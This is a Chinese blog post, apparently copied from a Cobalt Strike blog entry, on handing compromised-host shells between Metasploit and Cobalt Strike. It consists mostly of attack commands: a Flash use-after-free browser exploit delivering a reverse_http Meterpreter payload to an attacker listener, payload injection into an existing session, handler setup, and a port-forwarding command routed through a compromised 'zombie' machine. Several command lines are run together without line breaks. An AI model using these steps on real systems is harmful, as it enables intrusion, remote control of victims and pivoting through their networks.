Cobalt Strike 和 Metasploit Framework 联动
文章来源:https://blog.cobaltstrike.com/2016/01/05/interoperability-with-the-metasploit-framework/
MSF通过漏洞利用使得CS获得shell:
use exploit/multi/browser/adobe_flash_hacking_team_uafset PAYLOAD windows/meterpreter/reverse_httpset LHOST [Cobalt Strike's IP or hostname]set LPORT 80set DisablePayloadHandler Trueset PrependMigrate Trueexploit -j将Meterpreter shell 分享给 Cobalt Strike :
use exploit/windows/local/payload_injectset PAYLOAD windows/meterpreter/reverse_httpset LHOST [IP address of compromised system]set LPORT 80set SESSION 1set DisablePayloadHandler Trueexploit -j1.使用exploit/windows/local/payload_inject模块
2. 对于HTTP Beacon,将PAYLOAD设置为windows/meterpreter/reverse_http 或者 windows/meterpreter/reverse_https ,需要和CS一致
3.设置LHOST和LPORT指向您的Cobalt Strike侦听器。
4.将DisablePayloadHandler设置为True。
5.将SESSION设置为Meterpreter会话的会话ID
use exploit/multi/handlerset PAYLOAD windows/meterpreter/reverse_tcpset LHOST [IP address of compromised system]set LPORT 8443set ExitOnSession Falseexploit -jPS:经过测试,只有 windows/meterpreter/reverse_tcp 可以用,http和https用不起,不知道什么原因
MSF设置完毕之后,需要在CS设置监听器,Payload选择foreign,端口和IP选择MSF监听端口和IP。随后在图形界面选择需要分享的shell,邮件单击【spawn】,就可以了
【rportfwd 4444 远程主机IP 3333】:这个命令将在肉鸡中新建4444监听端口,然后转发给远程主机中的3333端口
posted on 2020-07-15 10:44 thisismynickname 阅读(308) 评论(0) 收藏 举报
浙公网安备 33010602011771号